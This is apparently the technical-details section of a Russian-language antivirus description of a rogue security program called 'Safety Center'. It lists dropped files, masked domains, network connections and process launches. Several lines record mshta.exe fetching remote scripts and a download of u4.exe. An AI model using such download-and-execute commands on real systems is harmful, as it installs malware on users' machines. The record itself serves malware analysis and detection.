Техническая информация
- "%TEMP%\protect.exe" (загружен из сети Интернет)
- <SYSTEM32>\mshta.exe http://ur###nam.net/ass.php
- <SYSTEM32>\mshta.exe http://cr#####-affiliates.com/install.php?id#################################
- <SYSTEM32>\cmd.exe /c """%TEMP%\t.bat"" "
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\ass[1].php
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\0D6B6PI5\install[1].php
- %TEMP%\protect.exe
- %TEMP%\par.exe
- %TEMP%\t.bat
- 'ur###nam.net':80
- 'cr#####-affiliates.com':80
- 'localhost':1034
- '22#.#96.59.23':80
- 'localhost':1035
- cr#####-affiliates.com/install.php?id#################################
- ur###nam.net/ass.php
- 22#.#96.59.23/u4.exe
- DNS ASK cr#####-affiliates.com
- DNS ASK ur###nam.net
- '<IP-адрес в локальной сети>':1037
- '<IP-адрес в локальной сети>':1036
- ClassName: 'TForm1' WindowName: 'Safety Center'
- ClassName: 'Shell_TrayWnd' WindowName: ''